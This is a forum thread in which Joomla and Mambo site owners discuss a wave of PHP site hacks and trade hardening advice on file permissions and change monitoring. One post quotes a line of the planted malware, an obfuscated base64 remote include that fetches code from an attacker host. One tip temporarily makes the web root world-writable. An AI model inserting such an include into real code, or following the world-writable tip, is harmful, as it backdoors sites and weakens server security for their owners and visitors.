Site Hacked - 2 files uplaoded...

[TWDesigns]

Here is what was uploaded to all the sites that were hacked.  I asked before posting this to make sure it was ok and I'm no programmer so someone else can take a looksee.

And

I've changed every pass I have and restored backups to be safe.  So if anything above looks like or decodes to a password no worries  :P
All sites were the latest Joomla! (patched)
One site was a much older version that I used for testing.. it had MOS_ tables so probably one of the firsts. It was off by it's self on a seperate domain.
No other software was installed on any other than Joomla! and 3rd party components.  None were components mentioned in other threads by users with the same problem.

.... Anything else I can give as far as information let me know! 

[webguy]

Exactly the same on the sites of my client.
My client was running Mambo 4.5.2.3.

Question is: is this Mambo/Joomla related or is it a server issue?

[j00be]

Re TWDesigns Post

Can you give us a list of third party modules, bots and components you had installed? This could help define the issue better.

Thanks!

[Christer]

It's not only all versions of joomla and mambo who are having these problems. Also php nuke and other php websites. The strange thing is that my html files are working fine. At my hosting company there are a lot of people who use other php scripts and these have the same symptones.

1. Blank white page
2 Redirect to a landing page (ppc)

That is why I think It's a server wide hack.

If your page redirects to a landing page look at the whois of the owner. Maybe it's the same one as mine. Some guy from Russia.

[webguy]

Christer,

Thanks for your explanation. I have experienced exactly the same thing.
Can you pleasy clarify what you mean by:

If your page redirects to a landing page look at the whois of the owner. Maybe it's the same one as mine. Some guy from Russia.

?

[TWDesigns]

I didn't see any posts over at postnuke or phpbb yet which is why I was worried it was a joomla/mambo issues, maybe I didn't look hard enough.  Anyways I just finished restoring all my sites (5am later), time for some shut eye 

Maybe the next few days will shed more light on the problem and what software is causing it.

[Christer]

I said that so we could check if it's just one person who is doing this are multiple hackers. I suppose we are all hosted somewhere else but you never know.

[guilliam]

maybe you can all post where you are hosted.. so you can see if you guys are all hosted under the same roof.

- g

[FuzzieDice]

You mentioned that two files were 'uploaded'. Can you also give the filenames they were uploaded as?

I've had some blank-page issues in phpBB of late too, even after a full upgrade. But I haven't seen any odd files that didn't seem to belong on the server.

[coldfrost]

Hi

They have changed many php-files in two of my sites. Would make a very long list, but it is related to components, modules and languages mostly.
Funny thing, I have one of those sites using both Joomla and Lifetype and only Joomla is hit

[TWDesigns]

My joomla sites that were locked down didnt get destroyed.  The ones with a open dir took the hit.

I do have a question about this.  I don't have time to look this back up but I think I remember joomla asking that some of the folders have permission 755 in order to function properly, for installing of coms and mods and the cache dir also.  If i set it to that it still tells me it's unwritable....  Anyone know why this is?  777 is the only way I can get the red warnings to turn green.

From a previous reply, the files that are uploaded are normally named..
Date.php
Time.php
Create.pho
Guest.php
there are a couple more but I can't think of them right now.  ALso the STRANGE thing is, the files appeared in the same dir's on all my sites with the same file name.  Like in languages I had date & time on all sites.  Almost like it was written to know where to put which file names..

[FuzzieDice]

Another question... do you know if php's 'safe mode' is on, on the hosting server?

[TWDesigns]

Relevant PHP Settings: 
Safe Mode: OFF

[FuzzieDice]

If safe mode was turned on, it might be that they wouldn't have been able to tamper with the files as easily. However, the drawback with safe mode being on is that scripts have a hard time writing files they need to, which can result in things like inability to install some modules, components and mambots, uploading files, images, etc.

[wayne]

I got exact same thing, I found this code
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9")

will link to : http://bis.iframe.ru/master.php .
anyone know how to provent this happend again.

[keh]

anyone know how to provent this happend again.

For starters: When you're finished installing and working with your site, leave as few folders as possible (and files if u have -  index.php i your template- for example) world writeble (chmod'ed to 777). If you leave your template index.php world writeble it's like an invitation to deface your site. Never install components, modules and templates with the new folders and files permissions set to world writeble in the global settings under the server tab. Use Joomla explorer component to control and overwrite files... I guess if you go through the folders that had the extra files in them for the defacement/redirect and the files that got changed, the file permissions was set to world writeable...

[jeffmather]

I found this site earlier today when I discovered this issue manifesting itself on my server.  At first, I thought it was related to Movable Type, but it appears to be any PHP-enabled host with 777 permissions on directories.  It's also not new, as I discovered my site had been doing this since June.

It's a fairly straightforward problem to clean up (see here) but it might indicate further vulnerabilities on your system.  My problems started after my site picked up a worm from a public computer when I was on vacation in India.  IE users will probably have told you they experienced miscellaneous badness, but it still a good idea to look for files with the same timestamp as the malicious php and .htaccess files.

This all seems related to certain Google hijacking exploits: http://clsc.net/research/google-302-page-hijack.htm.

Good luck.

[TWDesigns]

Thanks for that information Jeff.  I hope they find a fix for this because some DIR's require write access like cache and etc.  I saw a OScommerce installation last night that took a big hit also.  The default installation had TONS of writable directories...

Back to the drawing board.

[Tonie]

A small tip for the cache directory. I have deleted the cache directory and index.html from my install. I created the directory again with JoomlaXplorer (if you have shell access that is even easier). This will give your Apache user ownership of that directory. Copy the index.html file to it, and change the rights to 755. This will make sure that all Joomla components can read/write in this directory, without the 777 rights needed for your cache directory.

[TWDesigns]

Nice tip. Thanks! 

[TWDesigns]

I just got hit again with everything locked down... so I thought.  I had installed SMF Bridge and it wrote the dir's as owned by nobody which they gained access from.

Has anyone came up with a solution for the "nobody" problem yet.

[PaulEarley]

I created the directory again with JoomlaXplorer

I might be dense, but I cannot figure out how to add a NEW directory with JoomlaXplorer. Can you tell me how to do this?
Paul Earley

[TWDesigns]

haha, don't feel bad.  I was about to ask the same thing.  Maybe there is a newer version then what we have.

[Tonie]

This took me about 15 minutes to find out just now, done this months ago.

Ok, make sure that the rights on the public_html (the start of your webspace) has 777 rights instead of 755. When opening JoomlaXplorer now, there is a link on the right to create a file or directory. Create the directory, this is done with the Apache user rights. Change the rights of public_html back again, and it should have the configuration you want.

You can only create files or directories with JoomlaXplorer in directories where you have rights to do so.

Sorry for the confusion, I sure was for a moment .

[TWDesigns]

LOL Thanks for clearing that up 

[PaulEarley]

Thanks for that great tip. I never would have figured that out!
Paul Earley

[pmarfell]

I would like to know how people find that they have been "got at"?

There are thousands of files on the server. The action of the virus/bot or whatever might only seen by visitors who will probably just go away and never return.

I am not sure which sections need which access rights. A script would be great but would need root access or to do it through FTP I guess.

Does the tampering always show in modified dates? If it does then the process I have tried will catch things reasonably quickly. I connect via FTP and "dir -R c:\dirlist.txt". Some time later I do the same again but with a different file name and then put the files on a Linux box and "diff file1 file2" to see any diiferences.

What I would like to do is get the listing into a database. Do the comparison, Send an email if there are differences. Accept the differences. Run it again the next day. All by Cron.

[PicsOne]

Please, NEVER leave your files to 777. This is the first hole.
I modifie a grate script to change recursively files and directorys to diferente permissions(ej files 644 dirs 775).
Here it is:
http://contribs.org/modules/pbboard/vie ... hp?t=30543

Also run this beatifully utility:
http://miraculixx.freewebspace.com/

Pay atention to yours .htaccess files, the worn also infect this file.
Also read:
http://lists.indymedia.org/pipermail/im ... 05-eq.html

Thank you and sorry for my language
Normando

[atela]

Just discover today that all my joomla & mambo sites have been "hacked" this way... Also some other scripts (4images for example)

I will note all the recommendations about directories, but I know I'm lazy with these kind of things...

[RobS]

I am noticing more and more bad information when it comes to security and Joomla.  A lot of which seems to come from inexperience, the rest appears to be due to confusion.  Firstly, to address a comment made by Tonie:

A small tip for the cache directory. I have deleted the cache directory and index.html from my install. I created the directory again with JoomlaXplorer (if you have shell access that is even easier). This will give your Apache user ownership of that directory. Copy the index.html file to it, and change the rights to 755. This will make sure that all Joomla components can read/write in this directory, without the 777 rights needed for your cache directory.

You are not achieving any security advantage with this procedure, all you are doing is basically changing the ownership of the directory from your login to the Apache process, most likely the 'nobody' user.  If the attack is coming from a issue with Joomla or PHPBB or any other script on your website (which almost all of the attacks launched against Joomla seem to come from), it is running as 'nobody' and therefore has the same permissions as Apache.  The only thing that this would prevent is from another user on the web server from writing to this directory which in my opinion is a moot point.  You are achieving no practical security benefit from this configuration. 

Additionally, this always seems to need clarification.  For the most secure out of the box configuration, files and directories should be owned by a user that is NOT the same as the apache process user (usually the 'nobody' user).  Files should have permissions 644 and directories should have permissions 755.

Security is like an onion, it works best with many layers of protection.  And as I often regret having to say, it is very difficult to achieve a good level of security in a shared hosting environment.  The tools just are not there. 

@pmarfell

Does the tampering always show in modified dates? If it does then the process I have tried will catch things reasonably quickly. I connect via FTP and "dir -R c:\dirlist.txt". Some time later I do the same again but with a different file name and then put the files on a Linux box and "diff file1 file2" to see any differences.

What I would like to do is get the listing into a database. Do the comparison, Send an email if there are differences. Accept the differences. Run it again the next day. All by Cron.

A good attacker can modify a file without changing the modified timestamps.  However, given the nature of probably all Joomla attacks, this is not something to worry about.  Based on the comments of what you would like to do with this approach of comparing timestamps, you should look at an application called Tripwire.  There is an enterprise addition (read expensive) and an opensource free version available at http://sourceforge.net/projects/tripwire/  You can configure it to monitor many aspects of file or directory stats such as ownership, permissions, timestamp, checksum, etc.  It is very comprehensive and would make a great tool for monitoring Joomla directory structures.  You can also tell it to ignore the modification of certain stats, which is very useful for something like a log file where it will monitor to make sure the permissions and ownership haven't changed but it will ignore changes in the size of the file.  These principles can probably be applied very successfully to monitoring Joomla directory structures if you have the access to the server to install and configure it, which going back to the problem with shared hosting, many people unfortunately do not.  However, you indicated having access to cron, so perhaps you have this type of access.